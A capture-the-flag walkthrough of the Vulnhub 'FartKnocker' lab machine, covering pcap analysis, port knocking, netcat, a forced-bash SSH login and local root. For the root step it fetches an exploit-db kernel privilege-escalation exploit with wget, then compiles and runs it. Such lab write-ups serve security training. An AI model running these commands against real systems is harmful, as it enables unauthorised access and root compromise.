FartKnocker – Vulnhub CTF Challenge Walkthrough

Fart Knocker is a Boot2Root Challenge from TopHatSec Series and is available at Vulnhub. This is a unique and interesting challenge that includes Packet Analysis and Port Knocking.

In this walkthrough, I’ll be using Parrot Security OS but you can use any Linux distro you want.

Start the Virtual machine and use Netdiscover to find its IP Address. Register this IP to your local DNS file “/etc/hosts”.

sudo netdiscover -r [IP/subnet]
sudo nano /etc/hosts

 

Run a full port Nmap scan.

 

There’s no port open except HTTP. Open this on your browser.

Click on the link below, you’ll be prompted to download a file.

 

This is a “pcap” file. when you open this file in Wireshark, you’ll see a knocking pattern on port no 7000, 8000, 9000, 7000, 8000. Apply TCP filter to see the pattern.

 

Now, I’ll use a utility “knock” to knock these ports install Knockd

sudo apt install knockd
knock knock.local 7000 8000 9000 7000 8000
nmap -p- knock.local

 

By running Nmap scan, you can see a new port is open. By running Nmap, this port might become closed, knock again and use Netcat to connect to this port.

knock knock.local 7000 8000 9000 7000 8000
nc -v knock.local 8888

 

This port has revealed a new directory on the Web Server, which contains another PCAP file.

 

Again, open this file in Wireshark and follow TCP stream on port 8080.

 

Use Google Translate to translate this message.

 

So the next knocking sequence is 1, 3, 3, 7. Knock and run Nmap.

knock knock.local 1 3 3 7
nmap -p- knock.local

 

A new port opened, use Netcat to connect to it.

 

Open the new directory revealed by this port.

 

There is a base64 encoded message. Decode it by

echo T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK | base64 -d

 

Knock again and then run Nmap.

 

An SSH port is open, try to connect to it.

 

Connect to the SSH again using given credentials.

 

The shell opened for a few seconds and then closed. Try including the shell manually

ssh butthead@knock.local '/bin/bash'

 

We got a lower shell, now we need to get root. Run “uname -a” to check Kernel’s version.

 

Check exploit DB for any related exploits.

 

We found an exploit. Now, download this exploit using “wget”.

wget https://www.exploit-db.com/download/37292

 

Now compile this exploit using “gcc” and run it.

mv 37292 priv.c
gcc priv.c -o priv -pthread
./priv

And here’s the ROOT Flag!!

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Microsoft Makes Recall Opt-In While Improving Privacy

Kia Dealer Portal Vulnerability Risked Millions of Cars

Tor And Tails OS Announce Merger For Streamlined Operations